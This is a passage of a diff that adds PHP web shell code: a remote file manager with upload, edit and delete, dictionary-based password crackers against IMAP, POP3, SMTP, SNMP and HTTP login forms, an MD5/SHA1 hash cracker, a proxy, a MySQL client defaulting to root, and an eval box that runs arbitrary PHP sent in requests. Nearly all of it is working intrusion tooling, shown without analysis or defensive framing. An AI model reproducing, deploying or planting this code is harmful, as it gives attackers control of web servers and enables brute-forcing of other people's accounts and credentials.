+case '1':if(is_writeable($adr))if(is_file($adr))echo "[<a href=\"".hlinK("seC=edit&filE=$adr&workingdiR=$c")."\">$adr</a>]\n";if(is_dir($adr))echo "[<a href=\"".hlinK("seC=fm&workingdiR=$adr")."\">$adr</a>]\n";break;
+case '2':if(is_file($adr) &&  is_writeable($adr))echo "[<a href=\"".hlinK("seC=edit&filE=$adr&workingdiR=$c")."\">$adr</a>]\n";break;
+case '3':if(is_dir($adr) && is_writeable($adr))echo "[<a href=\"".hlinK("seC=fm&workingdiR=$adr")."\">$adr</a>]\n";break;
+case '4':if(is_file($adr))echo "[<a href=\"".hlinK("seC=edit&filE=$adr&workingdiR=$c")."\">$adr</a>]\n";break;
+case '5':if(is_dir($adr))echo "[<a href=\"".hlinK("seC=fm&workingdiR=$adr")."\">$adr</a>]\n";break;
+case '6':if(preg_match("@".$_REQUEST['search']."@",$cont)){if(is_file($adr))echo "[<a href=\"".hlinK("seC=edit&filE=$adr&workingdiR=$c")."\">$adr</a>]\n";if(is_dir($adr))echo "[<a href=\"".hlinK("seC=fm&workingdiR=$adr")."\">$adr</a>]\n";}break;
+case '7':if(strstr($cont,$_REQUEST['search'])){if(is_file($adr))echo "[<a href=\"".hlinK("seC=edit&filE=$adr&workingdiR=$c")."\">$adr</a>]\n";if(is_dir($adr))echo "[<a href=\"".hlinK("seC=fm&workingdiR=$adr")."\">$adr</a>]\n";}break;
+}
+if (is_dir($adr)) listdiR($adr,$_REQUEST['task']);
+}
+}
+if (!function_exists("posix_getpwuid") && !strstr($disablefunctions,'posix_getpwuid')) {function posix_getpwuid($u) {return 0;}}
+if (!function_exists("posix_getgrgid") && !strstr($disablefunctions,'posix_getgrgid')) {function posix_getgrgid($g) {return 0;}}
+function filemanager(){
+global $windows,$msgbox,$errorbox,$t,$et,$hcwd;
+$cwd= getcwd();
+$table = "<table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"100%\">";
+$td1n="<td width=\"22%\" bgcolor=\"#666666\">";
+$td2m="<td width=\"22%\" bgcolor=\"#808080\">";
+$td1i="<td width=\"5%\" bgcolor=\"#666666\">";
+$td2i="<td width=\"5%\" bgcolor=\"#808080\">";
+$tdnr="<td width=\"22%\" bgcolor=\"#800000\">";
+$tdw="<td width=\"22%\" bgcolor=\"#006E00\">";
+if (!empty($_REQUEST['task'])){
+if (!empty($_REQUEST['search'])) $_REQUEST['task'] = 7;
+if (!empty($_REQUEST['re'])) $_REQUEST['task'] = 6;
+echo "<font color=blue><pre>";
+listdiR($cwd,$_REQUEST['task']);
+echo "</pre></font>";
+}else{
+if (!empty($_REQUEST['cP']) || !empty($_REQUEST['mV'])|| !empty($_REQUEST['rN'])){
+if (!empty($_REQUEST['cP']) || !empty($_REQUEST['mV'])){
+$title="Destination";
+$ad = (!empty($_REQUEST['cP']))?$_REQUEST['cP']:$_REQUEST['mV'];
+$dis =(!empty($_REQUEST['cP']))?'Copy':'Move';
+}else{
+$ad = $_REQUEST['rN'];
+$title ="New name";
+$dis = "Rename";
+}
+if (!!empty($_REQUEST['deS'])){
+echo "<center><table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"40%\"><tr><td width=\"100%\" bgcolor=\"#333333\">$title:</td></tr><tr>$td1n<form method=\"POST\"><input type=text value=\"";if(empty($_REQUEST['rN'])) echo $cwd; echo "\" size=60 name=deS></td></tr><tr>$td2m$hcwd<input type=hidden value=\"".htmlspecialchars($ad)."\" name=cp><input class=buttons type=submit value=$dis></td></tr></form></table></center>";
+}else{
+if (!empty($_REQUEST['rN'])) renamE($ad,$_REQUEST['deS']);
+else{
+copy($ad,$_REQUEST['deS']);
+if (!empty($_REQUEST['mV']))unlink($ad);
+}
+}
+}
+if (!empty($_REQUEST['deL'])) { if (is_file($_REQUEST['deL'])|| is_link($_REQUEST['deL'])) unlink($_REQUEST['deL']);elseif(is_dir($_REQUEST['deL'])) {
+$dh = opendir($_REQUEST['deL']);
+$d="";
+while ($cont=readdir($dh)){$d++;}
+if ($d>2) echo "$errorbox\"".htmlspecialchars($_REQUEST['del'])."\" is not empty!<td><tr></table><br>";else rmdir($_REQUEST['del']);}}
+if (!empty($_FILES['uploadfile'])){
+move_uploaded_file($_FILES['uploadfile']['tmp_name'],$_FILES['uploadfile']['name']);
+echo "$msgbox<b>Uploaded!</b> File name: ".$_FILES['uploadfile']['name']." File size: ".$_FILES['uploadfile']['size']. "$et<br>";
+}
+$select = "<select onChange=\"window.location=this.options[this.selectedIndex].value;\"><option value=\"".hlinK("seC=fm&workingdiR=$cwd")."\">--------</option><option value=\"";
+if (!empty($_REQUEST['newf'])){
+if (!empty($_REQUEST['newfile'])){file_put_contents($_REQUEST['newf'],"");}
+if (!empty($_REQUEST['newdir'])){mkdir($_REQUEST['newf']);}
+}
+if ($windows){
+echo "$table<td><b>Drives:</b> ";
+for ($i=66;$i<=90;$i++){$drive= chr($i).':';
+if (is_dir($drive."\\")){$vol=shelL("vol $drive");if(empty($vol))$vol=$drive;echo " <a title=\"$vol\" href=".hlinK("seC=fm&workingdiR=$drive\\").">$drive\\</a>";}
+}
+echo $et;
+}
+echo "$table<form method=\"POST\"><tr><td width=\"20%\"><b>Location:</b><input type=text name=workingdiR size=135 value=\"".getcwd()."\"><input class=buttons type=submit value=Change></td></tr></form></table>";
+$file=array();$dir=array();$link=array();
+if($dirhandle = opendir($cwd)){
+while ($cont=readdir($dirhandle)){
+if (is_dir($cwd.DIRECTORY_SEPARATOR.$cont)) $dir[]= $cont;
+elseif (is_file($cwd.DIRECTORY_SEPARATOR.$cont)) $file[]=$cont;
+else $link[]=$cont;
+}
+closedir($dirhandle);
+sort($file);sort($dir);sort($link);
+echo "<table border=1 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"100%\"><tr><td width=\"30%\" bgcolor=\"#333333\" align=\"center\">Name</td><td width=\"13%\" bgcolor=\"#333333\" align=\"center\">Owner</td><td width=\"12%\" bgcolor=\"#333333\" align=\"center\">Modification time</td><td width=\"12%\" bgcolor=\"#333333\" align=\"center\">Last change</td><td width=\"5%\" bgcolor=\"#333333\" align=\"center\">Info</td><td width=\"7%\" bgcolor=\"#333333\" align=\"center\">Size</td><td width=\"15%\" bgcolor=\"#333333\" align=\"center\">Actions</td></tr>";
+$i=0;
+foreach($dir as $dn){
+echo "<tr>";
+$i++;
+$own="Unknow";
+$owner=posix_getpwuid(fileowner($dn));
+$mdate=date("Y/m/d H:i:s",filemtime($dn));
+$adate=date("Y/m/d H:i:s",fileatime($dn));
+$diraction = $select.hlinK("seC=fm&workingdiR=".realpath($dn))."\">Open</option><option value=\"".hlinK("seC=fm&workingdiR=$cwd&rN=$dn")."\">Rename</option><option value=\"".hlinK("seC=fm&deL=$dn&workingdiR=$cwd")."\">Remove</option></select></td>";
+if ($owner) $own = "<a title=\" Shell: ".$owner['shell']."\" href=\"".hlinK("seC=fm&workingdiR=".$owner['dir'])."\">".$owner['name']."</a>";
+if (($i%2)==0){$cl1=$td1i;$cl2=$td1n;}else{$cl1=$td2i;$cl2=$td2m;}
+if (is_writeable($dn)) echo $tdw;elseif (!is_readable($dn)) echo $tdnr;else echo $cl2;
+echo "<a href=\"".hlinK("seC=fm&workingdiR=".realpath($dn))."\">";
+if (strlen($dn)>45)echo substr($dn,0,42)."...";else echo $dn;echo "</a>";
+echo $cl1."$own</td>";
+echo $cl1."$mdate</td>";
+echo $cl1."$adate</td>";
+echo "</td>${cl1}D";if (is_readable($dn)) echo "R";if (is_writeable($dn)) echo "W";echo "</td>";
+echo "$cl1------</td>";
+echo $cl2.$diraction;
+echo "</tr>" ;
+flusheR();
+}
+foreach($file as $fn){
+echo "<tr>";
+$i++;
+$own = "Unknow";
+$owner = posix_getpwuid(fileowner($fn));
+$fileaction=$select.hlinK("seC=openit&namE=$fn&workingdiR=$cwd")."\">Open</option><option value=\"".hlinK("seC=edit&filE=$fn&workingdiR=$cwd")."\">Edit</option><option value=\"".hlinK("seC=fm&downloaD=$fn&workingdiR=$cwd")."\">Download</option><option value=\"".hlinK("seC=hex&filE=$fn&workingdiR=$cwd")."\">Hex view</option><option value=\"".hlinK("seC=img&filE=$fn&workingdiR=$cwd")."\">image</option><option value=\"".hlinK("seC=inc&filE=$fn&workingdiR=$cwd")."\">Include</option><option value=\"".hlinK("seC=checksum&filE=$fn&workingdiR=$cwd")."\">Checksum</option><option value=\"".hlinK("seC=fm&workingdiR=$cwd&cP=$fn")."\">Copy</option><option value=\"".hlinK("seC=fm&workingdiR=$cwd&mV=$fn")."\">Move</option><option value=\"".hlinK("seC=fm&workingdiR=$cwd&rN=$fn")."\">Rename</option><option value=\"".hlinK("seC=fm&deL=$fn&workingdiR=$cwd")."\">Remove</option></select></td>";
+$mdate = date("Y/m/d H:i:s",filemtime($fn));
+$adate = date("Y/m/d H:i:s",fileatime($fn));
+if ($owner) $own = "<a title=\"Shell:".$owner['shell']."\" href=\"".hlinK("seC=fm&workingdiR=".$owner['dir'])."\">".$owner['name']."</a>";
+$size = showsizE(filesize($fn));
+if (($i%2)==0){$cl1=$td1i;$cl2=$td1n;}else{$cl1=$td2i;$cl2=$td2m;}
+if (is_writeable($fn)) echo $tdw;elseif (!is_readable($fn)) echo $tdnr;else echo $cl2;
+echo "<a href=\"".hlinK("seC=openit&namE=$fn&workingdiR=$cwd")."\">";
+if (strlen($fn)>45)echo substr($fn,0,42)."...";else echo $fn;echo "</a>";
+echo $cl1."$own</td>";
+echo $cl1."$mdate</td>";
+echo $cl1."$adate</td>";
+echo "</td>$cl1";if (is_readable($fn)) echo "R";if (is_writeable($fn)) echo "W";if (is_executable($fn)) echo "X";if (is_uploaded_file($fn)) echo "U"; echo "</td>";
+echo "$cl1$size</td>";
+echo $td2m.$fileaction;
+echo "</tr>" ;
+flusheR();
+}
+foreach($link as $ln){
+$own = "Unknow";
+$i++;
+$owner = posix_getpwuid(fileowner($ln));
+$linkaction=$select.hlinK("seC=openit&namE=$ln&workingdiR=$ln")."\">Open</option><option value=\"".hlinK("seC=edit&filE=$ln&workingdiR=$cwd")."\">Edit</option><option value=\"".hlinK("seC=fm&downloaD=$ln&workingdiR=$cwd")."\">Download</option><option value=\"".hlinK("seC=hex&filE=$ln&workingdiR=$cwd")."\">Hex view</option><option value=\"".hlinK("seC=img&filE=$ln&workingdiR=$cwd")."\">image</option><option value=\"".hlinK("seC=inc&filE=$ln&workingdiR=$cwd")."\">Include</option><option value=\"".hlinK("seC=checksum&filE=$ln&workingdiR=$cwd")."\">Checksum</option><option value=\"".hlinK("seC=fm&workingdiR=$cwd&cP=$ln")."\">Copy</option><option value=\"".hlinK("seC=fm&workingdiR=$cwd&mV=$ln")."\">Move</option><option value=\"".hlinK("seC=fm&workingdiR=$cwd&rN=$ln")."\">Rename</option><option value=\"".hlinK("seC=fm&deL=$ln&workingdiR=$cwd")."\">Remove</option></select></td>";
+$mdate = date("Y/m/d H:i:s",filemtime($ln));
+$adate = date("Y/m/d H:i:s",fileatime($ln));
+if ($owner) $own = "<a title=\"Shell: ".$owner['shell']."\" href=\"".hlinK("seC=fm&workingdiR=".$owner['dir'])."\">".$owner['name']."</a>";
+echo "<tr>";
+$size = showsizE(filesize($ln));
+if (($i%2)==0){$cl1=$td1i;$cl2=$td1n;}else{$cl1=$td2i;$cl2=$td2m;}
+if (is_writeable($ln)) echo $tdw;elseif (!is_readable($ln)) echo $tdnr;else echo $cl2;
+echo "<a href=\"".hlinK("seC=openit&namE=$ln&workingdiR=$cwd")."\">";
+if (strlen($ln)>45)echo substr($ln,0,42)."...";else echo $ln;echo "</a>";
+echo $cl1."$own</td>";
+echo $cl1."$mdate</td>";
+echo $cl1."$adate</td>";
+echo "</td>${cl1}L";if (is_readable($ln)) echo "R";if (is_writeable($ln)) echo "W";if (is_executable($ln)) echo "X"; echo "</td>";
+echo "$cl1$size</td>";
+echo $cl2.$linkaction;
+echo "</tr>" ;
+flusheR();
+}
+}
+$dc = count($dir)-2;
+if($dc==-2)$dc=0;
+$fc = count($file);
+$lc = count($link);
+$total = $dc + $fc + $lc;
+echo "$table<tr><td><form method=POST>Find:<input type=text name=search><input type=checkbox name=re value=1 style=\"border-width:1px;background-color:#333333;\" checked>Regular expressions <input type=submit class=buttons value=Find>$hcwd<input type=hidden value=7 name=task></form></td><td><form method=POST>$hcwd<input type=hidden value=\"fm\" name=seC><select name=task><option value=0>Display files and directories in current folder</option><option value=1>Find writable files and directories in current folder</option><option value=2>Find writable files in current folder</option><option value=3>Find writable directories in current folder</option><option value=4>Display all files in current folder</option><option value=5>Display all directories in current folder</option></select><input type=submit class=buttons value=Do></form>$et</tr></table><table width=\"100%\"><tr><td width=\"50%\"><br><table bgcolor=#333333 border=0 width=\"65%\"><td><b>Summery:</b>   Total: $total Directories: $dc Files: $fc Links: $lc</td></table><table bgcolor=#333333 border=0 width=\"65%\"><td width=\"100%\" bgcolor=";if (is_writeable($cwd)) echo "#006E00";elseif (!is_readable($cwd)) echo "#800000";else "#333333"; echo ">Current directory status: "; if (is_readable($cwd)) echo "R";if (is_writeable($cwd)) echo "W" ;echo "</td></table><table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"65%\"><tr><td width=\"100%\" bgcolor=\"#333333\">New:</td></tr><tr>$td1n<form method=\"POST\"><input type=text size=47 name=newf></td></tr><tr>$td2m$hcwd<input class=buttons type=submit name=newfile value=\"File\"><input class=buttons type=submit name=newdir value=\"Folder\"></td></tr></form></table></td><td width=\"50%\"><br>${t}Upload:</td></tr><tr>$td1n<form method=\"POST\" enctype=\"multipart/form-data\"><input type=file size=45 name=uploadfile></td></tr><tr>$td2m$hcwd<input class=buttons type=submit value=Upload></td></tr>$td1n Note: Max allowed file size to upload on this server is ".ini_get('upload_max_filesize')."</td></tr></form></table>$et";
+}
+}
+function imaplogiN($host,$username,$password){
+$sock=fsockopen($host,143,$n,$s,5);
+$b=namE();
+$l=strlen($b);
+if(!$sock)return -1;
+fread($sock,1024);
+fputs($sock,"$b LOGIN $username $password\r\n");
+$res=fgets($sock,$l+4);
+if ($res == "$b OK")return 1;else return 0;
+fclose($sock);
+}
+function pop3logiN($server,$user,$pass){
+$sock=fsockopen($server,110,$en,$es,5);
+if(!$sock)return -1;
+fread($sock,1024);
+fwrite($sock,"user $user\n");
+$r=fgets($sock);
+if($r{0}=='-')return 0;
+fwrite($sock,"pass $pass\n");
+$r=fgets($sock);
+fclose($sock);
+if($r{0}=='+')return 1;
+return 0;
+}
+function imapcrackeR(){
+global $t,$et,$errorbox,$crack;
+if (!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){
+$target=$_REQUEST['target'];
+$type=$_REQUEST['combo'];
+$user=(!empty($_REQUEST['user']))?$_REQUEST['user']:"";
+$dictionary=fopen($_REQUEST['dictionary'],'r');
+if ($dictionary){
+echo "<font color=blue>Cracking ".htmlspecialchars($target)."...<br>";flusheR();
+while(!feof($dictionary)){
+if($type){
+$combo=trim(fgets($dictionary)," \n\r");
+$user=substr($combo,0,strpos($combo,':'));
+$pass=substr($combo,strpos($combo,':')+1);
+}else{
+$pass=trim(fgets($dictionary)," \n\r");
+}
+$imap=imaplogiN($target,$user,$pass);
+if($imap==-1){echo "$errorbox Can not connect to server.$et";break;}else{
+if ($imap){echo "U: $user P: $pass<br>";if(!$type)break;}}
+flusheR();
+}
+echo "<br>Done</font>";
+fclose($dictionary);
+}
+else{
+echo "$errorbox Can not open dictionary.$et";
+}
+}else echo "<center>${t}IMAP cracker:$crack";
+}
+function snmpcrackeR(){
+global $t,$et,$errorbox,$crack,$hcwd;
+if (!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){
+$target=$_REQUEST['target'];
+$dictionary=fopen($_REQUEST['dictionary'],'r');
+if ($dictionary){
+echo "<font color=blue>Cracking ".htmlspecialchars($target)."...<br>";flusheR();
+while(!feof($dictionary)){
+$com=trim(fgets($dictionary)," \n\r");
+$res=snmpchecK($target,$com,2);
+if($res)echo "$com<br>";
+flusheR();
+}
+echo "<br>Done</font>";
+fclose($dictionary);
+}
+else{
+echo "$errorbox Can not open dictionary.$et";
+}
+}else echo "<center>${t}SNMP cracker:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\">$hcwd<tr><td width=\"20%\" bgcolor=\"#666666\">Dictionary:</td><td bgcolor=\"#666666\"><input type=text name=dictionary size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Server:</td><td bgcolor=\"#808080\"><input type=text name=target size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right><input class=buttons type=submit value=Start></td></tr></form></table></center>";
+}
+function pop3crackeR(){
+global $t,$et,$errorbox,$crack;
+if (!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){
+$target=$_REQUEST['target'];
+$type=$_REQUEST['combo'];
+$user=(!empty($_REQUEST['user']))?$_REQUEST['user']:"";
+$dictionary=fopen($_REQUEST['dictionary'],'r');
+if ($dictionary){
+echo "<font color=blue>Cracking ".htmlspecialchars($target)."...<br>";flusheR();
+while(!feof($dictionary)){
+if($type){
+$combo=trim(fgets($dictionary)," \n\r");
+$user=substr($combo,0,strpos($combo,':'));
+$pass=substr($combo,strpos($combo,':')+1);
+}else{
+$pass=trim(fgets($dictionary)," \n\r");
+}
+$pop3=pop3logiN($target,$user,$pass);
+if($pop3==-1){echo "$errorbox Can not connect to server.$et";break;} else{
+if ($pop3){echo "U: $user P: $pass<br>";if(!$type)break;}}
+flusheR();
+}
+echo "<br>Done</font>";
+fclose($dictionary);
+}
+else{
+echo "$errorbox Can not open dictionary.$et";
+}
+}else echo "<center>${t}POP3 cracker:$crack";
+}
+function smtpcrackeR(){
+global $t,$et,$errorbox,$crack;
+if (!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){
+$target=$_REQUEST['target'];
+$type=$_REQUEST['combo'];
+$user=(!empty($_REQUEST['user']))?$_REQUEST['user']:"";
+$dictionary=fopen($_REQUEST['dictionary'],'r');
+if ($dictionary){
+echo "<font color=blue>Cracking ".htmlspecialchars($target)."...<br>";flusheR();
+while(!feof($dictionary)){
+if($type){
+$combo=trim(fgets($dictionary)," \n\r");
+$user=substr($combo,0,strpos($combo,':'));
+$pass=substr($combo,strpos($combo,':')+1);
+}else{
+$pass=trim(fgets($dictionary)," \n\r");
+}
+$smtp=smtplogiN($target,$user,$pass,5);
+if($smtp==-1){echo "$errorbox Can not connect to server.$et";break;} else{
+if ($smtp){echo "U: $user P: $pass<br>";if(!$type)break;}}
+flusheR();
+}
+echo "<br>Done</font>";
+fclose($dictionary);
+}
+else{
+echo "$errorbox Can not open dictionary.$et";
+}
+}else echo "<center>${t}SMTP cracker:$crack";
+}
+function formcrackeR(){
+global $errorbox,$footer,$et,$hcwd;
+if(!empty($_REQUEST['start'])){
+$url=$_REQUEST['target'];
+$uf=$_REQUEST['userf'];
+$pf=$_REQUEST['passf'];
+$sf=$_REQUEST['submitf'];
+$sv=$_REQUEST['submitv'];
+$method=$_REQUEST['method'];
+$fail=$_REQUEST['fail'];
+$dic=$_REQUEST['dictionary'];
+$type=$_REQUEST['combo'];
+$user=(!empty($_REQUEST['user']))?$_REQUEST['user']:"";
+if(!file_exists($dic)) die("$errorbox Can not open dictionary.$et$footer");
+$dictionary=fopen($dic,'r');
+echo "<font color=blue>Cracking started...<br>";
+while(!feof($dictionary)){
+if($type){
+$combo=trim(fgets($dictionary)," \n\r");
+$user=substr($combo,0,strpos($combo,':'));
+$pass=substr($combo,strpos($combo,':')+1);
+}else{
+$pass=trim(fgets($dictionary)," \n\r");
+}
+$url.="?$uf=$user&$pf=$pass&$sf=$sv";
+$res=check_urL($url,$method,$fail,12);
+if (!$res){echo "<font color=blue>U: $user P: $pass</font><br>";flusheR();if(!$type)break;}
+flusheR();
+}
+fclose($dictionary);
+echo "Done!</font><br>";
+}
+else echo "<center><table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"434\"><tr><td width=\"174\" bgcolor=\"#333333\">HTTP Form cracker:</td><td bgcolor=\"#333333\" width=\"253\"></td></tr><form method=\"POST\" name=form><tr><td width=\"174\" bgcolor=\"#666666\">Dictionary:</td><td bgcolor=\"#666666\" width=\"253\"><input type=text name=dictionary size=35></td></tr><tr><td width=\"174\" bgcolor=\"#808080\">Dictionary type:</td><td bgcolor=\"#808080\"><input type=radio name=combo checked value=0 onClick=\"document.form.user.disabled = false;\" style=\"border-width:1px;background-color:#808080;\">Simple (P)<input type=radio value=1 name=combo onClick=\"document.form.user.disabled = true;\" style=\"border-width:1px;background-color:#808080;\">Combo (U:P)</td></tr><tr><td width=\"174\" bgcolor=\"#666666\">Username:</td><td bgcolor=\"#666666\"><input type=text size=35 value=root name=user>$hcwd</td></tr><tr><td width=\"174\" bgcolor=\"#808080\">Action Page:</td><td bgcolor=\"#808080\" width=\"253\"><input type=text name=target value=\"http://".getenv('HTTP_HOST')."/login.php\" size=35></td></tr><tr><td width=\"174\" bgcolor=\"#666666\">Method:</td><td bgcolor=\"#666666\" width=\"253\"><select size=\"1\" name=\"method\"><option selected value=\"POST\">POST</option><option value=\"GET\">GET</option></select></td></tr><tr><td width=\"174\" bgcolor=\"#808080\">Username field name:</td><td bgcolor=\"#808080\" width=\"253\"><input type=text name=userf value=user size=35></td></tr><tr><td width=\"174\" bgcolor=\"#666666\">Password field name:</td><td bgcolor=\"#666666\" width=\"253\"><input type=text name=passf value=passwd size=35></td></tr><tr><td width=\"174\" bgcolor=\"#808080\">Submit name:</td><td bgcolor=\"#808080\" width=\"253\"><input type=text value=login name=submitf size=35></td></tr><tr><td width=\"174\" bgcolor=\"#666666\">Submit value:</td><td bgcolor=\"#666666\" width=\"253\"><input type=text value=\"Login\" name=submitv size=35></td></tr><tr><td width=\"174\" bgcolor=\"#808080\">Fail string:</td><td bgcolor=\"#808080\" width=\"253\"><input type=text name=fail value=\"Try again\" size=35></td></tr><tr><td width=\"174\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right width=\"253\"><input class=buttons type=submit name=start value=Start></td></tr></form></table></center>";
+}
+function hashcrackeR(){
+global $errorbox,$t,$et,$hcwd;
+if (!empty($_REQUEST['hash']) && !empty($_REQUEST['dictionary']) && !empty($_REQUEST['type'])){
+$dictionary=fopen($_REQUEST['dictionary'],'r');
+if ($dictionary){
+$hash=strtoupper($_REQUEST['hash']);
+echo "<font color=blue>Cracking " . htmlspecialchars($hash)."...<br>";flusheR();
+$type=($_REQUEST['type']=='MD5')?'md5':'sha1';
+while(!feof($dictionary)){
+$word=trim(fgets($dictionary)," \n\r");
+if ($hash==strtoupper(($type($word)))){echo "The answer is $word<br>";break;}
+}
+echo "Done!</font>";
+fclose($dictionary);
+}
+else{
+echo "$errorbox Can not open dictionary.$et";
+}
+}
+echo "<center>${t}Hash cracker:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#666666\">Dictionary:</td><td bgcolor=\"#666666\"><input type=text name=dictionary size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Hash:</td><td bgcolor=\"#808080\"><input type=text name=hash size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\">Type:</td><td bgcolor=\"#666666\"><select name=type><option selected value=MD5>MD5</option><option value=SHA1>SHA1</option></select></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\"></td><td bgcolor=\"#808080\" align=right>$hcwd<input class=buttons type=submit value=Start></td></tr></form></table></center>";
+}
+function pr0xy(){
+global $errorbox,$et,$footer,$hcwd;
+echo "<table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"100%\"><form method=\"POST\"><tr><td width=\"20%\"><b>Navigator: </b><input type=text name=urL size=140 value=\""; if(!!empty($_REQUEST['urL'])) echo "http://www.edpsciences.org/htbin/ipaddress"; else echo htmlspecialchars($_REQUEST['urL']);echo "\">$hcwd<input type=submit class=buttons value=Go></td></tr></form></table>";
+if (!empty($_REQUEST['urL'])){
+$dir="";
+$u=parse_url($_REQUEST['urL']);
+$host=$u['host'];$file=(!empty($u['path']))?$u['path']:'/';
+if(substr_count($file,'/')>1)$dir=substr($file,0,(strpos($file,'/')));
+$url=@fsockopen($host, 80, $errno, $errstr, 12);
+if(!$url)die("<br>$errorbox Can not connect to host!$et$footer");
+fputs($url, "GET /$file HTTP/1.0\r\nAccept-Encoding: text\r\nHost: $host\r\nReferer: $host\r\nUser-Agent: Mozilla/5.0 (compatible; Konqueror/3.1; FreeBSD)\r\n\r\n");
+while(!feof($url)){
+$con = fgets($url);
+$con = str_replace("href=mailto","HrEf=mailto",$con);
+$con = str_replace("HREF=mailto","HrEf=mailto",$con);
+$con = str_replace("href=\"mailto","HrEf=\"mailto",$con);
+$con = str_replace("HREF=\"mailto","HrEf=\"mailto",$con);
+$con = str_replace("href=\'mailto","HrEf=\"mailto",$con);
+$con = str_replace("HREF=\'mailto","HrEf=\"mailto",$con);
+$con = str_replace("href=\"http","HrEf=\"".hlinK("seC=px&urL=http"),$con);
+$con = str_replace("HREF=\"http","HrEf=\"".hlinK("seC=px&urL=http"),$con);
+$con = str_replace("href=\'http","HrEf=\"".hlinK("seC=px&urL=http"),$con);
+$con = str_replace("HREF=\'http","HrEf=\"".hlinK("seC=px&urL=http"),$con);
+$con = str_replace("href=http","HrEf=".hlinK("seC=px&urL=http"),$con);
+$con = str_replace("HREF=http","HrEf=".hlinK("seC=px&urL=http"),$con);
+$con = str_replace("href=\"","HrEf=\"".hlinK("seC=px&urL=http://$host/$dir/"),$con);
+$con = str_replace("HREF=\"","HrEf=\"".hlinK("seC=px&urL=http://$host/$dir/"),$con);
+$con = str_replace("href=\"","HrEf=\'".hlinK("seC=px&urL=http://$host/$dir/"),$con);
+$con = str_replace("HREF=\"","HrEf=\'".hlinK("seC=px&urL=http://$host/$dir/"),$con);
+$con = str_replace("href=","HrEf=".hlinK("seC=px&urL=http://$host/$dir/"),$con);
+$con = str_replace("HREF=","HrEf=".hlinK("seC=px&urL=http://$host/$dir/"),$con);
+echo $con;
+}
+fclose($url);
+}
+}
+function mysqlclienT(){
+global $t,$errorbox,$et,$hcwd;
+if (!empty($_REQUEST['serveR']) && !empty($_REQUEST['useR']) && !empty($_REQUEST['pasS']) && !empty($_REQUEST['querY'])){
+$server=$_REQUEST['serveR'];$pass=$_REQUEST['pasS'];$user=$_REQUEST['useR'];$query=$_REQUEST['querY'];
+if(!empty($_REQUEST['dB']))$db=$_REQUEST['dB'];
+$link = @mysql_connect($server,$user,$pass);
+if($link){
+if (!empty($db))mysql_select_db($db);
+$result=mysql_query($query,$link);
+echo "${t}Query result(s):$et";
+echo "<font color=blue><pre>";
+while($data=mysql_fetch_row($result)){
+foreach($data as $v) {
+echo $v;
+echo "\t";
+}
+echo "\n";
+}
+echo "</pre></font>";
+mysql_close($link);
+}
+else{
+echo "$errorbox Login failed!$et<br>";
+}
+}
+echo "<center>${t}MySQL cilent:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#666666\">Server:</td><td bgcolor=\"#666666\"><input type=text value=\"";if (!empty($_REQUEST['server'])) echo htmlspecialchars($_REQUEST['server']);else echo "localhost:3306"; echo "\" name=serveR size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Username:</td><td bgcolor=\"#808080\"><input type=text name=useR value=\"";if (!empty($_REQUEST['user'])) echo htmlspecialchars($_REQUEST['user']);else echo "root"; echo "\" size=35></td><tr><td width=\"20%\" bgcolor=\"#666666\">Password:</td><td bgcolor=\"#666666\"><input type=text value=\"";if (!empty($_REQUEST['pass'])) echo htmlspecialchars($_REQUEST['pass']);else echo "123456"; echo "\" name=pasS size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Database:</td><td bgcolor=\"#808080\"><input type=text value=\"";if (!empty($_REQUEST['db'])) echo htmlspecialchars($_REQUEST['db']); echo "\" name=dB size=35></td><tr><td width=\"20%\" bgcolor=\"#666666\">Query:</td><td bgcolor=\"#666666\"><textarea name=querY rows=5 cols=27>";if (!empty($_REQUEST['query'])) echo htmlspecialchars(($_REQUEST['query']));else echo "SHOW DATABASES"; echo "</textarea></td></tr></tr><tr><td width=\"20%\" bgcolor=\"#808080\"></td><td bgcolor=\"#808080\" align=right>$hcwd<input class=buttons type=submit value=\"Submit Query\"></td></tr></form></table></center>";
+}
+function phpevaL(){
+global $t,$hcwd;
+if (!empty($_REQUEST['code'])){
+echo "<center><textarea rows=\"10\" cols=\"64\">";
+$code = str_replace("<?php","",$_REQUEST['code']);
+$code = str_replace("<?","",$code);
+$code = str_replace("?>","",$code);
+htmlspecialchars(eval($code));
+echo "</textarea></center><br>";
+}
+echo "<center>${t}Evaler:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#666666\">Codes:</td><td bgcolor=\"#666666\"><textarea rows=\"10\" name=\"code\" cols=\"64\">";if(!empty($_REQUEST['code']))echo htmlspecialchars($_REQUEST['code']);echo "</textarea></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right>$hcwd<input class=buttons type=submit value=Execute></td></tr></form></table></center>";
+}
+function whoiS(){
+global $t,$hcwd;
+if (!empty($_REQUEST['server']) && !empty($_REQUEST['domain'])){
+$server =$_REQUEST['server'];
+$domain=$_REQUEST['domain']."\r\n";
+$ser=fsockopen($server,43,$en,$es,5);
+fputs($ser,$domain);
+echo "<pre>";
